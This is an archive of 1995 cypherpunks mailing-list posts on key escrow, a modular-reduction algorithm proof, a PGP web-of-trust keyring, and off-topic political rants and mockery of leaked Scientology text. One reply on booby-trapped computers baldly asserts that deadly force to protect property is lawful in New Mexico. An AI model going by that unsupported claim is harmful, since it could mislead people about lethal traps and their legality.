PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBME6KSyxV6mvvBgf5AQFGTQQAhxXbnoS1EoxRGTHKAukZzRIYFGu++Zuq
2zywwlKSUdxFm9di914qembuEb8rGTwqUGagESjs3p2oZe9xKFHricSr0LFOeoSh
Vx+mioL1hEaBMzKBrMNAD4OA7lPi7EEzeEFSb589TgNqH5DBvYxMwfWNXCe5I/A1
WjHU0YqtiwU=
=gKJF
-----END PGP SIGNATURE-----

>: : >>: OT7-48
>: : >>: 1.   Find some plants, trees, etc., and communicate to them
>: : >>: individually until you know they received your communication.
>: : >>: 2.   Go to a zoo or a place with many types of life and communicate
>: : >>: with each of them until you know the communication is
>: : >>: received and, if possible, returned.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 7 Sep 95 13:47:08 PDT
To: dmandl@panix.com
Subject: Re: Collection of personal info
Message-ID: <199509072046.QAA26704@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:46 PM 9/7/95 -0400, dmandl@panix.com wrote:

>> And once the interface improves...
>
>...I won't have to deal with the inefficiencies of real sex, live
>music performances, or (non-virtual) world travel ever again.
>
>> Actually, the creation of separate "spaces" that can only be entered with
>> your (each person's) permission will have a big impact on life in the real
>> world.   

Dave.  Sorry you didn't catch the implied change of tone in the above.  I
meant to show a switch from Space Cadet rhetoric about the nets to a more
realistic view. 

>> And once the interface improves...

>> Actually, the creation of separate "spaces" that can only be entered with
>> your (each person's) permission

These separate spaces won't wipe out the Real World (used with permission)
but they will influence it as a form of private property that is self
enforcing neither dependent on force for protection nor capable of being
penetrated by force.  This is a BIG THING.  You can't live in it yet but you
will certainly be able to trade digital goods and services there and stash
digital goods (work product, databases, etc.).

Having a place that is under your exclusive control has enormous practical
and psychological implications.  Think of the change that occurred when
peasants came to be able to own land.  Cyberspace contains spaces that can
be cheaply created, individually owned, and free of confiscation.  And since
the bulk of the wealth of OECD countries is non-physical (consisting of
various forms of ownership rights and "choses in action") that wealth can be
protected cryptographically.

>I've got to tell you, Duncan, this kind of rhetoric pushes me over to
>the luddite side more every day.
>
>No flame intended--just one man's opinion.

Don't you like the idea of a "place" that's yours alone?  It's not dangerous
(to you).  It increases your choices.  Your power.

DCF

"You don't have to be nice to nation states you meet on the way up if you're
not coming back down."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 7 Sep 95 13:42:48 PDT
To: cypherpunks@toad.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <9509072042.AA20013@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



> >"If keys are escrowed, what purpose does a 64 bit limit serve?"

> This question was asked, it seems like a zillion times, but
> probably no more than four or five times.
 
> It is a bit of a belt and suspenders idea. But it also shows how
> scared they are about real encryption.

Is there an actual quote - did an identifiable government person actually 
use the 'belt and suspenders' line? This is getting to the point where 
journalists could have something to hang a story on.

I think we can infer from this that the USG has, or soon expects to have, 
the ability to brute 64 bits of key.

> It is clear that this meeting is a shame. Everyone in industry
                                                           ^^^^^^^^
A shame certainly, but I suspect you meant 'sham' (not a spelling flame, 
the difference in meaning is important).
 
> Pat
>

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Thu, 7 Sep 95 16:47:38 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: fast modular reduction
In-Reply-To: <199509070811.EAA07559@clark.net>
Message-ID: <Pine.SUN.3.91.950907131638.6760C-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


>  Anyway, I played around with the algorithm a little, and it's neat
> and easy to implement, but the speed increase is not worth
> the patent hassle (assuming there is a speed increase, I saw none)
> 
>   The algorithm is still basically O(n^2) if used in a modexp
> routine. It requires n^2 multiplications and additions. Whereas,
> a typical Karatsuba multiplication using a high precision
> reciprocal will only use 2*n^1.5 multiplications and 5*n^1.5/8
> additions. (for n=64 which is a 2048-bit number being reduced, 
> it's about 1/5 the multiplications, but 5 times the additions)

I agree with you that the patent hassle is probably not worth the speed 
increase.  If I came up with the algorithm by myself and on my own time, 
I certainly would not have filed a patent for it, but that wasn't the 
case.  I also agree that the patent system should be abolished, but there 
is nothing I can do about that either.

The speed increase does exist over Montgomery's modular reduction 
because it uses n*n multiplications and 1 division compared to n*(n+1) 
multiplications, and the pre- and post-calculations are much simpler.

Division using Karatsuba multiplication does seem to have a better 
asymptote, but is probably slower for most practical lengths.  Both 
Lenstra's LIP and Lacy's CryptLib use Montgomery for modular reduction.

The numbers you give are a bit off.  Assuming a 32-bit machine,
n=64 implies a 2048-bit modulus, and a 4096-bit number to be reduced. 
Also, Karatsuba should use 1/3 (2*64^1.58 / 64^2) the multiplications
rather than 1/5. 

Wei Dai





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Thu, 7 Sep 95 13:52:40 PDT
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Are booby-trapped computers legal?
In-Reply-To: <199509060419.XAA04296@einstein.ssz.com>
Message-ID: <Pine.SV4.3.91.950907165123.21790q-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I am pretty sure that it is lawful to use deadly force to protect 
property, in New Mexico.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 7 Sep 95 08:00:41 PDT
To: cypherpunks@toad.com
Subject: Re: fast modular reduction (proof?)
Message-ID: <9509071459.AA01801@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> In the following pseudocode, B is the radix in which the numbers are 
> represented (2^32 for a 32-bit machine), n is the length of modulus in 
> blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 
> is the length of X, and Y is the result.
> 
> 1. Y = X
> 2. For i from k down to n+1, repeat steps 3 and 4
> 3.	Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1)
> 4.	If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1)




To do a proof I rewrite the algorithm:



n = len(modulus)                   // modulus < B^n

Y = X                              // obviously Y = X mod modulus


K =  B ^ (n+1) - U                 // U = B ^ (n+1) mod modulus,
                                   // therefore K = 0 mod modulus
				   // furthermore K > 0


for (i=len(Y)-1 ; i>n  ;  i--)
 {

   F = B ^ (i-n-1) * K             // F > 0
                                   // F = 0 mod modulus

   Y -=  Y[i] * F                  // Y shrinking, but
                                   // Y still the same mod modulus


   if ( Y >= B^i )
      Y -= F                       // again shrinking,
                                   // still the same mod modulus

 }


This shows that Y was shrinking, but is still equal to X mod modulus.









To see whether Y really shrinks enough:

  Y = sum(i=0..len(Y)-1)  Y[i] * B^i


In the step Y = Y - Y[i] * B^i the highest block of Y is deleted (what
could be done fast by reducing the length of Y). 

  Now  Y < B^i





Afterwards the same value mod modulus is added to keep Y constant: 

  Y = Y + Y[i] * U * B^(i-n-1).


  Y[i]<B   ->  Y[i]+1  <= B
  
  U < modulus < B^n , therefore U < B^n

  ->    (Y[i]+1) * U < B * B^n  = B^(n+1)

  ->    Y[i] * U  < B^(n+1) - U

  ->    Y[i] * U *  B^ (i-n-1 )  < F




  Therefore after doing the addition

    Y < B^i + F




  Check of the last step:

  0 <= U < B^n therefore 

  B^n  <  B^(n+1) - U  <= B^(n+1)

  Therefore in every loop


  B^(i-1) < F <= B^i


  ->   Y-F  < B^i



Partial Correctness:






Y = X                              [ Y = X mod 
                                     Y < B^len(X) ]


K =  B ^ (n+1) - U                 [ K = 0 mod
                                     
                                     B^n < K <= B^(n+1) ]                
                                   
				   


for (i=len(X)-1 ; i>n  ;  i--)
 {
        [ Y = X mod  ,  Y < B^(i+1) ]


   F = B ^ (i-n-1) * K 
   
        [ F = 0 mod  ,   B^(i-1) < F <= B^i  ]

        [ 0 <= Y[i] < B ]

        [ Y[i] * F  = 0 mod ,
          0 <= Y[i] * F  < B^(i+1) ]


        [ Y >= Y[i] * B^i  ->  Y >= Y[i] * F ]

   Y -=  Y[i] * F

        [ Y = X mod ,
          Y < B^i + F  (reason see above) ,
          Y >= 0 ]
          



   if ( Y >= B^i )
      Y -= F                       // again shrinking,
                                   // still the same mod modulus



      [ Y = X mod ,
        Y >= 0    ,
        Y < B^i ]

 }



Last i was n+1, therefore

  Y = X mod ,  Y >= 0 , Y < B^(n+1)


This is not enough,  Y < B^n is requested. The loop can't be done once
more because i-n-1 would become negative.

k+1 was the length of X, and  n the length of the modulus. You walk
down from k to n+1 . In every loop you remove one block of the
number. This means you have to do len(X)-len(modulus) loops. In the
pseudocode you do only len(X)-len(modulus)-1 loops.



One loop seems to be missing. This may be a
result of confusion whether your Y starts with Y[0] or Y[1]. 


I do understand the algorithm as:

n = len(modulus)
U = B^n  mod modulus
K = B^n - U                         // = 0 mod modulus,  0 < K < B^n
Y = X

for(i=len(X)-1 ; i>= n ; i--)       // squeeze Block i in Number Y
 {                                  // Y < B ^ (i+1)

   F = B ^ ( i-n )  * K             // F = 0 mod modulus

   Y -= Y[i] * F                    // subtract  Y[i] * B^i, now Y < B ^ i
                                    // add the equivalent Y[i] * B^(i-n)*U <= F
                                    // now Y < B^i + F

   if ( Y >= B[i] )
     Y -= F                         // now Y < B^i

 }

Last i was n, therefore Y < B^n , Y = X mod modulus , 
but perhaps still Y >= modulus.

Ok, algorithm understood and agreed (after modifying the loop counter).

Any more agreement or disagreements?

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Fri, 8 Sep 95 00:26:07 PDT
To: cypherpunks@toad.com
Subject: Re: Announce: Web of Trust Ring
Message-ID: <199509072300.RAA00742@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

First: after mailing myself the file in 16k chunks... the ring is up, and
intact. The only difference from what the original was supposed to be is
that both of my keys are now assigned a trust of unknown instead of 
undefined. *shrug* 

From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>

>A very interesting project!  Can you give us some data like how many is the
>maximum number of hops necessary to connect two people on the WoT?  (I am
>aware that one wouldn't want to trust such a connection, and that PGP 
>doesn't actually allow you to do so for hops > 2...)

My original message details the brute-force approach I took, and the
imperfections that it intails. If everybody who signed a key recieved a
signature back from the same person, the ring I generated really would be
"The" WoT. (I don't mean to center on "my ring" versus local WoTs that
people have, but I centered around Warlord, Zimmermann, and Jeff S., and
seeing as how those happen to be keys that come with PGP, that's where I'd
imagine most people would start looking.) Unfortunately, there are a lot
of nobodies included just because they signed someone elses key. For the
same reason, someone who was signed by a well-known key, but didn't sign
back, and didn't sign anybody elses key who was included, didn't make it
to the ring. Imperfections aside, the ring is 4.5 meg smaller than the
unimi keyring, which makes it Pretty Good[tm]. (ha ha)

I forgot to mention it before, but this keyring is most accurately
described as a keyring full of some of the people who are more relevant to
the Web of Trust than lots of the people who aren't in the keyring. 

PGP lets you define how many levels of trust you want. Due to the way
in which the ring was constructed, I'd guess that the longest chain could
not be longer than 6-8 keys. 

>(P.S.  I guess "12" based on the number of passes necessary.  That seems 
>like a really high number to me...)

No kidding. I ran the program with high priority most of the time, but
I was doing on my home 386... Hence the 4-6 hour runtimes per pass.

>Are any obvious pseudonyms in?  (I would guess not.)

YEEEEEEESSSSSSS, there are. 

(Hint: check for @whitehouse.gov)

>I wonder what sorts of statistical analyses could be done on this WoT?  

It's still full of _nobodies_ who only got in because they signed a known
key of someone they never met and mailed it to a keyserver. Unfortunately,
I don't have the technical abilities to check for mutual signatures, or
only include keys that are signed by someone already in the WoT. 

That's _my_ expert statistical analysis...

>Is it fairly evenly spread out or are the noticeably larger "clumps" of 
>mutual signatures?  How many keys *are* there in this (subset of the) WoT?

There's a couple people that have half a zillion sigs. Many people have
signed someone else's key but have noone else's sig on their own. 

>Here's a question:  for two randomly selected members of your WoT, how many
>signatures would a Man In The Middle have to fake in order to isolate 
>the one member from the other?

If we talk about the WoT instead of the WoN (web of nobodies) then I would
guess faking 2-3 specific (attacker-chosen) people would cut off a good
share of the keys, 4-5 for many more, and about 500 (ok, maybe only 15-25)
for some of the well connected people. 

For jargon's sake we can call those the Dial-up, the ISDN and the T3 people
respectively.

>Thanks for this, Don.

:)

- -Don the Dialup

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBME95P8La+QKZS485AQHmHQMAs0UXaSan5PWDfppPU1WCNuz7eiXgpxeS
Y+2vHc1ZofT+Mq99Y2+aMgZGPasowQ/zdLIf4mNLZR1QNEf7eUf9wCLXY2fH5REw
t4uwpvRlz9TkkaUbwSmW+kBXept8H7WE
=8kPL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 7 Sep 95 17:27:16 PDT
To: Rob Lowry <robl@on-ramp.ior.com>
Subject: Re: Collection of personal info
In-Reply-To: <Pine.LNX.3.91.950906210405.19265B-100000@on-ramp.ior.com>
Message-ID: <Pine.BSD.3.91.950907172351.22454B-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Sep 1995, Rob Lowry wrote:
> I am new to the crypto scene and still think PGP is neato ;)

Welcome, you will learn a lot of great material here, and yes it is 
neato.  I just wish it came pre-installed with WinDoze...

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Thu, 7 Sep 95 08:32:59 PDT
To: cypherpunks@toad.com
Subject: Re: fast modular reduction (proof?)
Message-ID: <9509071531.AA01869@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> In the following pseudocode, B is the radix in which the numbers are 
> represented (2^32 for a 32-bit machine), n is the length of modulus in 
> blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 
> is the length of X, and Y is the result.
> 
> 1. Y = X
> 2. For i from k down to n+1, repeat steps 3 and 4
> 3.    Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1)
> 4.    If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1)




To do a proof I rewrite the algorithm:



n = len(modulus)                   // modulus < B^n

Y = X                              // obviously Y = X mod modulus


K =  B ^ (n+1) - U                 // U = B ^ (n+1) mod modulus,
                                   // therefore K = 0 mod modulus
                                   // furthermore K > 0


for (i=len(Y)-1 ; i>n  ;  i--)
 {

   F = B ^ (i-n-1) * K             // F > 0
                                   // F = 0 mod modulus

   Y -=  Y[i] * F                  // Y shrinking, but
                                   // Y still the same mod modulus


   if ( Y >= B^i )
      Y -= F                       // again shrinking,
                                   // still the same mod modulus

 }


This shows that Y was shrinking, but is still equal to X mod modulus.





To see whether Y really shrinks enough:

  Y = sum(i=0..len(Y)-1)  Y[i] * B^i


In the step Y = Y - Y[i] * B^i the highest block of Y is deleted (what
could be done fast by reducing the length of Y). 

  Now  Y < B^i





Afterwards the same value mod modulus is added to keep Y constant: 

  Y = Y + Y[i] * U * B^(i-n-1).


  Y[i]<B   ->  Y[i]+1  <= B
  
  U < modulus < B^n , therefore U < B^n

  ->    (Y[i]+1) * U < B * B^n  = B^(n+1)

  ->    Y[i] * U  < B^(n+1) - U

  ->    Y[i] * U *  B^ (i-n-1 )  < F




  Therefore after doing the addition

    Y < B^i + F


  Check of the last step:

  0 <= U < B^n therefore 

  B^n  <  B^(n+1) - U  <= B^(n+1)

  Therefore in every loop


  B^(i-1) < F <= B^i


  ->   Y-F  < B^i



Partial Correctness:






Y = X                              [ Y = X mod 
                                     Y < B^len(X) ]


K =  B ^ (n+1) - U                 [ K = 0 mod
                                     
                                     B^n < K <= B^(n+1) ]                
                                   
                                   


for (i=len(X)-1 ; i>n  ;  i--)
 {
        [ Y = X mod  ,  Y < B^(i+1) ]


   F = B ^ (i-n-1) * K 
   
        [ F = 0 mod  ,   B^(i-1) < F <= B^i  ]

        [ 0 <= Y[i] < B ]

        [ Y[i] * F  = 0 mod ,
          0 <= Y[i] * F  < B^(i+1) ]


        [ Y >= Y[i] * B^i  ->  Y >= Y[i] * F ]

   Y -=  Y[i] * F

        [ Y = X mod ,
          Y < B^i + F  (reason see above) ,
          Y >= 0 ]
          



   if ( Y >= B^i )
      Y -= F                       // again shrinking,
                                   // still the same mod modulus



      [ Y = X mod ,
        Y >= 0    ,
        Y < B^i ]

 }



Last i was n+1, therefore

  Y = X mod ,  Y >= 0 , Y < B^(n+1)


This is not enough,  Y < B^n is requested. The loop can't be done once
more because i-n-1 would become negative.

k+1 was the length of X, and  n the length of the modulus. You walk
down from k to n+1 . In every loop you remove one block of the
number. This means you have to do len(X)-len(modulus) loops. In the
pseudocode you do only len(X)-len(modulus)-1 loops.



One loop seems to be missing. This may be a
result of confusion whether your Y starts with Y[0] or Y[1]. 


I do understand the algorithm as:

n = len(modulus)
U = B^n  mod modulus
K = B^n - U                         // = 0 mod modulus,  0 < K < B^n
Y = X

for(i=len(X)-1 ; i>= n ; i--)       // squeeze Block i in Number Y
 {                                  // Y < B ^ (i+1)

   F = B ^ ( i-n )  * K             // F = 0 mod modulus

   Y -= Y[i] * F                    // subtract  Y[i] * B^i, now Y < B ^ i
                                    // add the equivalent Y[i] * B^(i-n)*U <= F
                                    // now Y < B^i + F

   if ( Y >= B[i] )
     Y -= F                         // now Y < B^i

 }

Last i was n, therefore Y < B^n , Y = X mod modulus , 
but perhaps still Y >= modulus.

Ok, algorithm understood and agreed (after modifying the loop counter).

Any more agreements or disagreements?

Hadmut

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBME8QImc1jG5vDiNxAQFREgQAiMWfgy3bZtPckCNToAvKP7A+JevlnrqG
wJT6/111656nAZHDF5Htr2vwPEmiR522IvPKMG2MnOanMIRn2bgBYG3GECA3zlDo
ZnXNT1OXdtZzv848WPryLVjSJrrVTX/PUN9d6LaTqLBP5pZXwAYkO5kLU6/WP6yL
tF+fniXDZvk=
=Ev0S
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 7 Sep 95 17:33:13 PDT
To: Gary Jeffers <gjeffers@socketis.net>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <199509070639.BAA00416@mail.socketis.net>
Message-ID: <Pine.BSD.3.91.950907173030.22454C-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Sep 1995, Gary Jeffers wrote:

> Date: Wed, 06 Sep 1995 22:42:42 -0500
> From: Gary Jeffers <gjeffers@socketis.net>
> To: cypherpunks@toad.com
> Subject: ON OFF-TOPIC
> 
>                     ON  OFF-TOPIC
> 
>      THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!
> 
> 
>        CRYPTO CODERS SUPPLY THE MEANS!
> CONSPIRACY THEORISTS SUPPLY THE MOTIVATION!
> 
> 
> conspiracy theorist = alternative political theorist
> NOT= AP/ABC/CBS/NBC/CIA/FBI/U.S GOV'N./New York Times/Washington Post
> opinion moulders syndicate
> 
> "extremist right-wing kook" = old fashioned American patriot
> Left term used often by left-wing extremist liberal statist kooks.
> 
> The United States "Federal" Government - we'll be even more American
> without it.
> 
> 
> 
>                                               PUSH EM BACK! PUSH EM BACK!
>                                               WWWAAAYYYY  BBBAAACCCK!
>                                               BBBEEEAAATTTT  STATE!
> 
> 

So true my friend, I have been saying this for years.  Glad to find 
another patriot here.   BTW, I love your cheer!

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 7 Sep 95 17:41:47 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <199509070834.EAA04213@frankenstein.piermont.com>
Message-ID: <Pine.BSD.3.91.950907173758.22454D-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Perry E. Metzger wrote:
> 
> Was this really needed?

Yes, it is my bet that there are some patriots in this list.  The desire 
to protect one's privacy is a very "patriot" thiung to want to do.  
CyPherpunks appears to be a lot of peole who are against big brothert 
government, and quite probably for restoring the constitution...am I right?


> > Gary Jeffers writes:
> >                     ON  OFF-TOPIC
> > 
> >      THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!
> 

||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 7 Sep 95 17:58:43 PDT
To: Jiri Baum <jirib@cs.monash.edu.au>
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <199509070600.QAA11675@molly.cs.monash.edu.au>
Message-ID: <Pine.BSD.3.91.950907174613.22454G-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Jiri Baum wrote:

> 
> >: : >>: OT7-48
> >: : >>: 1.   Find some plants, trees, etc., and communicate to them
> >: : >>: individually until you know they received your communication.
> >: : >>: 2.   Go to a zoo or a place with many types of life and communicate
> >: : >>: with each of them until you know the communication is
> >: : >>: received and, if possible, returned.
> 


I gotta read more of this drivil!   ROTFL!   ROTFL!!!


No wonder they dont want it out!  They look like tey belong in the 
funny-farm....Have you ever seen those cute uniforms they wear?  
[really!  Hollywood california, I have *been* to their "church"]   
especially the girls, reminds me of school-uniforms, but they are all so 
grown up [yum!] but with the minds of a moron....[see above drivil they read]

I know this is somewhat off-topic, but I just *had* to say it!


||||||||||||email address: starrd@iia2.org or starrd@cinenet.net|||||||||||
|    Creator of the original                |         Get paid to upload  |
|      Patriot's Archives                    \     shareware to BBSes and |
| ftp: iia.org /pub/users/patriot              \_____      the Internet!  |
| ftp: wuarchive.wustl.edu /pub/msdos_uploads/patriot\      Get file:     |
| For index of available files: descript.ion           \  uploader.zip    |
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzAN3FwAAAEEAOgWK9QJo3LIPXC+C/RHE+nmlddXPthC0hgLL7oKg7WPjYgk
LrX7j0eUmb5e6t2sm/PkJ1wjk839fqjUmRPLD0mhPX6KsMB0DoecYbCKLrNUY1gP
7DZijj9e7fuPaHqhuY7K5rGjN4po4ZxGhEPQv32IjQLSza9nbU05aMuMG71tAAUR
tB9EYXZpZCBXIFN0YXJyIDxzdGFycmRAaWlhMi5vcmc+iQCVAwUQMCnJQEY2REVK
Mit9AQG9AAQAps4lKzeQ/OQyXbvxG4b5wWsvHEK/K+1L/tfG0+EmlEsDARaN2pBD
cCslIKHjBa8al2BaTSsNjCUSHMgd+IWRp+nw2XJt/lRqpvTN5m7pPNAEQbSgCGwf
9kJ1IDPMokOw9XXAuGAqMQi9HogepNxp7JOdNphcJulHf9XbyCy/sig=
=0Tlq
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 7 Sep 95 17:50:22 PDT
To: trei@process.com
Subject: Re: Notes from NIS&T Key Escrow Export conference.
Message-ID: <ac74e2382f021004c882@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:59 PM 9/7/95, Pat Farrell wrote:
>>"If keys are escrowed, what purpose does a 64 bit limit serve?"
>
>This question was asked, it seems like a zillion times, but
>probably no more than four or five times.
>
>It is a bit of a belt and suspenders idea. But it also shows how
>scared they are about real encryption.
>
>It is clear that this meeting is a shame. Everyone in industry
                                    ^^^^^

Sham? Or shame? Or, likely, both?


Your account of the meeting merely confirms my worst fears.

But don't they say the Chinese character for "crisis" also means "opportunity"?

(Sort of the way the English word "oversight" has two very different and
opposite meanings.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: starrd <starrd@iia2.org>
Date: Thu, 7 Sep 95 18:09:02 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: ON OFF-TOPIC
In-Reply-To: <199509080057.UAA05313@frankenstein.piermont.com>
Message-ID: <Pine.BSD.3.91.950907180215.790B-100000@usr2.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Sep 1995, Perry E. Metzger wrote:

> Date: Thu, 07 Sep 1995 20:57:32 -0400
> From: Perry E. Metzger <perry@piermont.com>
> To: starrd <starrd@iia2.org>
> Cc: cypherpunks@toad.com
> Subject: Re: ON OFF-TOPIC 
> 
> 
> starrd writes:
> > On Thu, 7 Sep 1995, Perry E. Metzger wrote:
> > > 
> > > Was this really needed?
> > 
> > Yes, it is my bet that there are some patriots in this list.
> 
> Pardon, but I don't care. There are also several socialists on this
> list. Shall I help them out by posting a long tract on the labor
> theory of value? There are several religious christians here. Shall we
> begin to discuss the divinity of Jesus? There are also some Jews here
> -- we could have a bunch of religious debates, and the atheists could
